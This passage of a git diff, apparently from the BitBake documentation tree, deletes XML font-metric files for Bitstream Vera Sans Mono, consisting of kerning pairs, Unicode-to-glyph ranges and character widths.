kpx2="180"/><pair kern="-35" kpx2="197"/><pair kern="-54" kpx2="181"/></kerning><kerning kpx1="253"><pair kern="-17" kpx2="169"/><pair kern="-17" kpx2="60"/><pair kern="-17" kpx2="187"/><pair kern="18" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-17" kpx2="234"/></kerning><kerning kpx1="211"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning><kerning kpx1="78"><pair kern="-17" kpx2="107"/><pair kern="-30" kpx2="126"/><pair kern="-35" kpx2="235"/><pair kern="-35" kpx2="72"/><pair kern="-35" kpx2="112"/><pair kern="-35" kpx2="123"/><pair kern="-35" kpx2="113"/><pair kern="-17" kpx2="105"/><pair kern="-30" kpx2="129"/><pair kern="-35" kpx2="124"/><pair kern="-17" kpx2="106"/><pair kern="-35" kpx2="125"/><pair kern="-35" kpx2="115"/><pair kern="-30" kpx2="88"/><pair kern="-35" kpx2="122"/><pair kern="-17" kpx2="68"/><pair kern="-35" kpx2="82"/><pair kern="-35" kpx2="114"/><pair kern="-35" kpx2="186"/><pair kern="-30" kpx2="127"/><pair kern="-17" kpx2="108"/><pair kern="-30" kpx2="128"/><pair kern="-17" kpx2="109"/><pair kern="-35" kpx2="92"/><pair kern="-35" kpx2="121"/><pair kern="-17" kpx2="110"/></kerning><kerning kpx1="52"><pair kern="-21" kpx2="180"/><pair kern="-63" kpx2="197"/><pair kern="27" kpx2="16"/><pair kern="-17" kpx2="181"/></kerning><kerning kpx1="125"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="42"><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="169"/><pair kern="-26" kpx2="197"/><pair kern="-35" kpx2="55"/><pair kern="-49" kpx2="60"/><pair kern="-49" kpx2="187"/><pair kern="-21" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-49" kpx2="234"/></kerning><kerning kpx1="170"><pair kern="-17" kpx2="235"/><pair kern="-35" kpx2="199"/><pair kern="-17" kpx2="251"/><pair kern="-109" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-54" kpx2="59"/><pair kern="-109" kpx2="60"/><pair kern="-35" kpx2="201"/><pair kern="-17" kpx2="253"/><pair kern="-109" kpx2="234"/><pair kern="-17" kpx2="90"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="210"/><pair kern="-35" kpx2="36"/><pair kern="-54" kpx2="58"/><pair kern="-91" kpx2="55"/><pair kern="-17" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="50"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="-17" kpx2="39"/><pair kern="-35" kpx2="98"/><pair kern="-17" kpx2="45"/><pair kern="-35" kpx2="173"/><pair kern="-17" kpx2="92"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="89"/><pair kern="-86" kpx2="57"/><pair kern="-35" kpx2="37"/><pair kern="-35" kpx2="174"/></kerning><kerning kpx1="115"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="90"><pair kern="-91" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-104" kpx2="197"/><pair kern="-54" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="36"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="55"><pair kern="-165" kpx2="107"/><pair kern="-155" kpx2="235"/><pair kern="-91" kpx2="16"/><pair kern="-169" kpx2="112"/><pair kern="-169" kpx2="123"/><pair kern="-58" kpx2="251"/><pair kern="-169" kpx2="113"/><pair kern="-165" kpx2="86"/><pair kern="-151" kpx2="129"/><pair kern="-169" kpx2="124"/><pair kern="-91" kpx2="169"/><pair kern="-169" kpx2="252"/><pair kern="-169" kpx2="70"/><pair kern="-146" kpx2="85"/><pair kern="-77" kpx2="201"/><pair kern="-165" kpx2="106"/><pair kern="-109" kpx2="29"/><pair kern="-58" kpx2="100"/><pair kern="-169" kpx2="122"/><pair kern="-165" kpx2="68"/><pair kern="-169" kpx2="82"/><pair kern="-155" kpx2="186"/><pair kern="-165" kpx2="250"/><pair kern="-77" kpx2="98"/><pair kern="-21" kpx2="181"/><pair kern="-118" kpx2="17"/><pair kern="-58" kpx2="38"/><pair kern="-169" kpx2="121"/><pair kern="-165" kpx2="228"/><pair kern="-169" kpx2="254"/><pair kern="-151" kpx2="126"/><pair kern="-169" kpx2="72"/><pair kern="-77" kpx2="199"/><pair kern="-165" kpx2="105"/><pair kern="-58" kpx2="253"/><pair kern="-169" kpx2="125"/><pair kern="-169" kpx2="115"/><pair kern="-54" kpx2="170"/><pair kern="-151" kpx2="88"/><pair kern="-169" kpx2="111"/><pair kern="-165" kpx2="90"/><pair kern="-77" kpx2="36"/><pair kern="-17" kpx2="55"/><pair kern="-169" kpx2="114"/><pair kern="-151" kpx2="127"/><pair kern="-165" kpx2="108"/><pair kern="-30" kpx2="76"/><pair kern="-151" kpx2="128"/><pair kern="-77" kpx2="173"/><pair kern="-165" kpx2="109"/><pair kern="-155" kpx2="92"/><pair kern="-128" kpx2="197"/><pair kern="-165" kpx2="110"/><pair kern="-77" kpx2="174"/></kerning><kerning kpx1="114"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="50"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="91"><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="111"/><pair kern="-30" kpx2="122"/><pair kern="-30" kpx2="82"/><pair kern="-30" kpx2="114"/><pair kern="-30" kpx2="72"/><pair kern="-30" kpx2="112"/><pair kern="-30" kpx2="123"/><pair kern="-30" kpx2="113"/><pair kern="-30" kpx2="124"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-30" kpx2="121"/><pair kern="-30" kpx2="125"/><pair kern="-30" kpx2="115"/></kerning><kerning kpx1="39"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="-17" kpx2="98"/><pair kern="-54" kpx2="187"/><pair kern="-26" kpx2="181"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-17" kpx2="170"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="236"><pair kern="-17" kpx2="180"/><pair kern="-72" kpx2="17"/><pair kern="-91" kpx2="197"/><pair kern="-35" kpx2="29"/></kerning><kerning kpx1="45"><pair kern="-35" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="169"/><pair kern="-54" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-17" kpx2="199"/><pair kern="-35" kpx2="16"/><pair kern="-17" kpx2="174"/><pair kern="-17" kpx2="98"/><pair kern="-30" kpx2="181"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="173"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="197"><pair kern="-35" kpx2="246"/><pair kern="-54" kpx2="235"/><pair kern="-35" kpx2="43"/><pair kern="-35" kpx2="123"/><pair kern="-54" kpx2="251"/><pair kern="-183" kpx2="187"/><pair kern="-54" kpx2="208"/><pair kern="18" kpx2="144"/><pair kern="-35" kpx2="59"/><pair kern="-17" kpx2="73"/><pair kern="-35" kpx2="41"/><pair kern="-35" kpx2="124"/><pair kern="-35" kpx2="85"/><pair kern="-183" kpx2="60"/><pair kern="18" kpx2="201"/><pair kern="-183" kpx2="234"/><pair kern="-54" kpx2="100"/><pair kern="-35" kpx2="122"/><pair kern="-35" kpx2="47"/><pair kern="-54" kpx2="210"/><pair kern="-35" kpx2="82"/><pair kern="-123" kpx2="58"/><pair kern="-54" kpx2="186"/><pair kern="-54" kpx2="175"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-35" kpx2="81"/><pair kern="18" kpx2="98"/><pair kern="-54" kpx2="38"/><pair kern="-35" kpx2="121"/><pair kern="-183" kpx2="57"/><pair kern="-35" kpx2="37"/><pair kern="-35" kpx2="120"/><pair kern="-35" kpx2="51"/><pair kern="18" kpx2="199"/><pair kern="-35" kpx2="53"/><pair kern="-35" kpx2="137"/><pair kern="-35" kpx2="233"/><pair kern="-54" kpx2="253"/><pair kern="-54" kpx2="52"/><pair kern="-35" kpx2="125"/><pair kern="-35" kpx2="42"/><pair kern="-95" kpx2="90"/><pair kern="18" kpx2="36"/><pair kern="-137" kpx2="55"/><pair kern="-54" kpx2="50"/><pair kern="-35" kpx2="39"/><pair kern="-35" kpx2="236"/><pair kern="22" kpx2="45"/><pair kern="18" kpx2="173"/><pair kern="-54" kpx2="92"/><pair kern="-114" kpx2="89"/><pair kern="-35" kpx2="46"/><pair kern="18" kpx2="174"/></kerning><kerning kpx1="92"><pair kern="-142" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-146" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-72" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="89"><pair kern="-77" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-132" kpx2="197"/><pair kern="-26" kpx2="16"/><pair kern="-54" kpx2="29"/><pair kern="-17" kpx2="181"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="46"><pair kern="-17" kpx2="107"/><pair kern="-72" kpx2="235"/><pair kern="-104" kpx2="16"/><pair kern="-49" kpx2="112"/><pair kern="-49" kpx2="123"/><pair kern="-54" kpx2="251"/><pair kern="-26" kpx2="213"/><pair kern="-49" kpx2="113"/><pair kern="-35" kpx2="187"/><pair kern="-54" kpx2="208"/><pair kern="-49" kpx2="129"/><pair kern="-49" kpx2="124"/><pair kern="-63" kpx2="169"/><pair kern="-35" kpx2="60"/><pair kern="-17" kpx2="201"/><pair kern="-17" kpx2="106"/><pair kern="-35" kpx2="234"/><pair kern="-54" kpx2="100"/><pair kern="-49" kpx2="122"/><pair kern="-17" kpx2="68"/><pair kern="-54" kpx2="210"/><pair kern="-35" kpx2="58"/><pair kern="-49" kpx2="82"/><pair kern="-72" kpx2="186"/><pair kern="-54" kpx2="175"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-17" kpx2="98"/><pair kern="-30" kpx2="181"/><pair kern="-26" kpx2="212"/><pair kern="-54" kpx2="38"/><pair kern="-49" kpx2="121"/><pair kern="-49" kpx2="126"/><pair kern="-26" kpx2="104"/><pair kern="-49" kpx2="72"/><pair kern="-17" kpx2="199"/><pair kern="-30" kpx2="180"/><pair kern="-17" kpx2="105"/><pair kern="-54" kpx2="253"/><pair kern="-26" kpx2="211"/><pair kern="-49" kpx2="125"/><pair kern="-49" kpx2="115"/><pair kern="-49" kpx2="88"/><pair kern="-17" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-49" kpx2="114"/><pair kern="-54" kpx2="50"/><pair kern="-49" kpx2="127"/><pair kern="-17" kpx2="108"/><pair kern="-49" kpx2="128"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="109"/><pair kern="-72" kpx2="92"/><pair kern="-17" kpx2="110"/><pair kern="-17" kpx2="174"/><pair kern="-26" kpx2="56"/></kerning><kerning kpx1="174"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="56"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning></font-metrics>
\ No newline at end of file
diff --git a/bitbake/doc/template/VeraMoBd.xml b/bitbake/doc/template/VeraMoBd.xml
deleted file mode 100644
index 9b33107a44..0000000000
--- a/bitbake/doc/template/VeraMoBd.xml
+++ /dev/null
@@ -1 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?><font-metrics metrics-version="2" type="TYPE0"><font-name>BitstreamVeraSansMono-Bold</font-name><full-name>Bitstream Vera Sans Mono Bold</full-name><family-name>Bitstream Vera Sans Mono</family-name><embed/><cap-height>729</cap-height><x-height>546</x-height><ascender>759</ascender><descender>-240</descender><bbox><left>-19</left><bottom>-235</bottom><right>605</right><top>928</top></bbox><flags>34</flags><stemv>0</stemv><italicangle>0</italicangle><subtype>TYPE0</subtype><multibyte-extras><cid-type>CIDFontType2</cid-type><default-width>0</default-width><bfranges><bf gi="3" ue="126" us="32"/><bf gi="172" ue="160" us="160"/><bf gi="163" ue="161" us="161"/><bf gi="132" ue="163" us="162"/><bf gi="189" ue="164" us="164"/><bf gi="150" ue="165" us="165"/><bf gi="231" ue="166" us="166"/><bf gi="134" ue="167" us="167"/><bf gi="142" ue="168" us="168"/><bf gi="139" ue="169" us="169"/><bf gi="157" ue="170" us="170"/><bf gi="169" ue="171" us="171"/><bf gi="164" ue="172" us="172"/><bf gi="256" ue="173" us="173"/><bf gi="138" ue="174" us="174"/><bf gi="217" ue="175" us="175"/><bf gi="131" ue="176" us="176"/><bf gi="147" ue="177" us="177"/><bf gi="241" ue="179" us="178"/><bf gi="141" ue="180" us="180"/><bf gi="151" ue="181" us="181"/><bf gi="136" ue="182" us="182"/><bf gi="195" ue="183" us="183"/><bf gi="221" ue="184" us="184"/><bf gi="240" ue="185" us="185"/><bf gi="158" ue="186" us="186"/><bf gi="170" ue="187" us="187"/><bf gi="243" ue="190" us="188"/><bf gi="162" ue="191" us="191"/><bf gi="173" ue="192" us="192"/><bf gi="201" ue="193" us="193"/><bf gi="199" ue="194" us="194"/><bf gi="174" ue="195" us="195"/><bf gi="98" ue="197" us="196"/><bf gi="144" ue="198" us="198"/><bf gi="100" ue="199" us="199"/><bf gi="203" ue="200" us="200"/><bf gi="101" ue="201" us="201"/><bf gi="200" ue="202" us="202"/><bf gi="202" ue="203" us="203"/><bf gi="207" ue="204" us="204"/><bf gi="204" ue="207" us="205"/><bf gi="232" ue="208" us="208"/><bf gi="102" ue="209" us="209"/><bf gi="210" ue="210" us="210"/><bf gi="208" ue="212" us="211"/><bf gi="175" ue="213" us="213"/><bf gi="103" ue="214" us="214"/><bf gi="239" ue="215" us="215"/><bf gi="145" ue="216" us="216"/><bf gi="213" ue="217" us="217"/><bf gi="211" ue="219" us="218"/><bf gi="104" ue="220" us="220"/><bf gi="234" ue="221" us="221"/><bf gi="236" ue="222" us="222"/><bf gi="137" ue="223" us="223"/><bf gi="106" ue="224" us="224"/><bf gi="105" ue="225" us="225"/><bf gi="107" ue="226" us="226"/><bf gi="109" ue="227" us="227"/><bf gi="108" ue="228" us="228"/><bf gi="110" ue="229" us="229"/><bf gi="160" ue="230" us="230"/><bf gi="111" ue="231" us="231"/><bf gi="113" ue="232" us="232"/><bf gi="112" ue="233" us="233"/><bf gi="114" ue="235" us="234"/><bf gi="117" ue="236" us="236"/><bf gi="116" ue="237" us="237"/><bf gi="118" ue="239" us="238"/><bf gi="233" ue="240" us="240"/><bf gi="120" ue="241" us="241"/><bf gi="122" ue="242" us="242"/><bf gi="121" ue="243" us="243"/><bf gi="123" ue="244" us="244"/><bf gi="125" ue="245" us="245"/><bf gi="124" ue="246" us="246"/><bf gi="184" ue="247" us="247"/><bf gi="161" ue="248" us="248"/><bf gi="127" ue="249" us="249"/><bf gi="126" ue="250" us="250"/><bf gi="128" ue="252" us="251"/><bf gi="235" ue="253" us="253"/><bf gi="237" ue="254" us="254"/><bf gi="186" ue="255" us="255"/><bf gi="251" ue="263" us="262"/><bf gi="253" ue="269" us="268"/><bf gi="0" ue="270" us="270"/><bf gi="0" ue="271" us="271"/><bf gi="0" ue="272" us="272"/><bf gi="255" ue="273" us="273"/><bf gi="246" ue="287" us="286"/><bf gi="248" ue="304" us="304"/><bf gi="214" ue="305" us="305"/><bf gi="225" ue="322" us="321"/><bf gi="176" ue="339" us="338"/><bf gi="249" ue="351" us="350"/><bf gi="227" ue="353" us="352"/><bf gi="187" ue="376" us="376"/><bf gi="229" ue="382" us="381"/><bf gi="166" ue="402" us="402"/><bf gi="215" ue="710" us="710"/><bf gi="224" ue="711" us="711"/><bf gi="218" ue="730" us="728"/><bf gi="223" ue="731" us="731"/><bf gi="216" ue="732" us="732"/><bf gi="222" ue="733" us="733"/><bf gi="159" ue="937" us="937"/><bf gi="155" ue="960" us="960"/><bf gi="178" ue="8212" us="8211"/><bf gi="0" ue="8213" us="8213"/><bf gi="0" ue="8214" us="8214"/><bf gi="0" ue="8215" us="8215"/><bf gi="182" ue="8217" us="8216"/><bf gi="196" ue="8218" us="8218"/><bf gi="0" ue="8219" us="8219"/><bf gi="180" ue="8221" us="8220"/><bf gi="197" ue="8222" us="8222"/><bf gi="0" ue="8223" us="8223"/><bf gi="130" ue="8224" us="8224"/><bf gi="194" ue="8225" us="8225"/><bf gi="135" ue="8226" us="8226"/><bf gi="0" ue="8227" us="8227"/><bf gi="0" ue="8228" us="8228"/><bf gi="0" ue="8229" us="8229"/><bf gi="171" ue="8230" us="8230"/><bf gi="198" ue="8240" us="8240"/><bf gi="190" ue="8250" us="8249"/><bf gi="258" ue="8364" us="8364"/><bf gi="140" ue="8482" us="8482"/><bf gi="152" ue="8706" us="8706"/><bf gi="0" ue="8707" us="8707"/><bf gi="0" ue="8708" us="8708"/><bf gi="0" ue="8709" us="8709"/><bf gi="168" ue="8710" us="8710"/><bf gi="154" ue="8719" us="8719"/><bf gi="0" ue="8720" us="8720"/><bf gi="153" ue="8721" us="8721"/><bf gi="238" ue="8722" us="8722"/><bf gi="0" ue="8723" us="8723"/><bf gi="0" ue="8724" us="8724"/><bf gi="188" ue="8725" us="8725"/><bf gi="0" ue="8726" us="8726"/><bf gi="0" ue="8727" us="8727"/><bf gi="0" ue="8728" us="8728"/><bf gi="257" ue="8729" us="8729"/><bf gi="165" ue="8730" us="8730"/><bf gi="0" ue="8731" us="8731"/><bf gi="0" ue="8732" us="8732"/><bf gi="0" ue="8733" us="8733"/><bf gi="146" ue="8734" us="8734"/><bf gi="156" ue="8747" us="8747"/><bf gi="167" ue="8776" us="8776"/><bf gi="143" ue="8800" us="8800"/><bf gi="0" ue="8801" us="8801"/><bf gi="0" ue="8802" us="8802"/><bf gi="0" ue="8803" us="8803"/><bf gi="148" ue="8805" us="8804"/><bf gi="185" ue="9674" us="9674"/><bf gi="192" ue="64258" us="64257"/><bf gi="0" ue="65535" us="65535"/></bfranges><cid-widths start-index="0"><wx w="602"/><wx w="0"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/><wx w="602"/></cid-widths></multibyte-extras></font-metrics>
\ No newline at end of file
diff --git a/bitbake/doc/template/VeraMono.xml b/bitbake/doc/template/VeraMono.xml
deleted file mode 100644
index 3a0a86659c..0000000000
--- a/bitbake/doc/template/VeraMono.xml
+++ /dev/null
@@ -1 +0,0 @@
